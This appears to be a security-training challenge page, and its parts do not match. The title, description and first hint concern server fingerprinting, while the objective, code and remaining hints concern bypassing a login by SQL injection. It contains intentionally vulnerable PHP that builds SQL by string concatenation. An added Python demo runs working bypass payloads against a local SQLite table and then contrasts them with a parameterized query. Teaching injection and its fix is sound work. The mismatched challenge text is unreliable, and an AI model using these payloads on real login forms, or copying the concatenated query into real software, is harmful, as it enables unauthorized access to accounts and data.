easy

Level 1: Server Fingerprinting (No Server Header)

Recon

Challenge Description

The origin hides its Server header. Determine which web server powers this app anyway.

Objective

Bypass the login form without knowing valid credentials and retrieve the admin's secret data.

What you'll learn
  • How SQL queries can be manipulated through user input
  • The danger of string concatenation in SQL
  • Basic SQL injection techniques

Need a Hint?
Trigger a server-generated error (e.g., 405 at /probes/methods) to fingerprint behavior.

Consider this query structure:

SELECT * FROM users
WHERE username = 'INPUT'
AND password = 'INPUT'

What happens if you input a single quote? The quote terminates the string literal early, so whatever follows it is parsed as SQL rather than treated as data. A lone quote leaves the query syntactically broken and triggers a database error; a quote followed by your own SQL (an OR clause, or a comment marker that discards the rest of the statement) changes what the WHERE clause actually tests.

SecureCorp Admin Portal

Authorized Personnel Only
Password field shown as text for educational purposes
Vulnerable Code (for learning)
<?php
// $username and $password are taken straight from the login form with no
// escaping, so a quote in either value becomes part of the SQL text.
$query = "SELECT * FROM users
          WHERE username = '$username'
          AND password = '$password'";

// $conn is the application's mysqli connection; the string above is sent verbatim.
$result = $conn->query($query);
This code is intentionally vulnerable. Never build SQL by string concatenation: use prepared statements with bound parameters, so user input is always passed to the database as data and never as query text.
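The hint about the single quote and the vulnerable PHP above describe the same mechanism. The following is an added example, not code from the challenge site, that reproduces it end to end in Python against an in-memory SQLite table: a query built by string concatenation (mirroring the PHP) is probed with a lone quote, then bypassed with two classic payloads, and the parameterized version is shown to reject the same input. The table contents, the user names and the flag value are constructed for this example, and the column name `secret` is an assumption (the page only says "the admin's secret data").

```python
import sqlite3

# Constructed sample data for this example (not from the challenge site).
# Column names other than username/password are assumed.
USERS = [
    ("admin", "correct-horse-battery-staple", "FLAG{example-secret}"),
    ("alice", "alice123", "nothing interesting"),
]


def make_db() -> sqlite3.Connection:
    """Create a throwaway users table that stands in for the app's database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, secret TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", USERS)
    return conn


def build_vulnerable_query(username: str, password: str) -> str:
    """Mirror the page's PHP: form input is pasted straight into the SQL text."""
    return (
        "SELECT username, secret FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str):
    """Concatenated query. Returns the first matching row or None; a lone quote
    in the input makes the SQL unparseable and the driver raises."""
    return conn.execute(build_vulnerable_query(username, password)).fetchone()


def login_safe(conn: sqlite3.Connection, username: str, password: str):
    """Prepared statement with bound parameters: the values travel separately
    from the query text, so quotes in them are just characters in a string."""
    return conn.execute(
        "SELECT username, secret FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


def probe_single_quote(conn: sqlite3.Connection) -> bool:
    """The first hint: a single quote breaks the statement. Returns True when the
    database reports a syntax error, which is the signal an attacker looks for."""
    try:
        login_vulnerable(conn, "'", "anything")
    except sqlite3.OperationalError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("single quote causes a DB error:", probe_single_quote(db))

    # Payload 1: close the string, then comment out the password check.
    # SQL seen by the DB: ... WHERE username = 'admin' --' AND password = 'x'
    print("username=admin' -- :", login_vulnerable(db, "admin' --", "x"))

    # Payload 2: make the WHERE clause always true via the password field.
    # AND binds tighter than OR, so this reads (user AND pass) OR '1'='1'.
    print("password=' OR '1'='1 :", login_vulnerable(db, "nobody", "' OR '1'='1"))

    # The same payloads against the parameterized query match nothing.
    print("safe, payload 1:", login_safe(db, "admin' --", "x"))
    print("safe, payload 2:", login_safe(db, "nobody", "' OR '1'='1"))
    print("safe, real creds:", login_safe(db, "admin", "correct-horse-battery-staple"))
```

Note the operator precedence in payload 2: `' OR '1'='1` only works from the password field here, because placed in the username field it yields `username = '' OR ('1'='1' AND password = '')`, which is still false. The comment-marker payload in the username field avoids that problem by discarding the password check entirely.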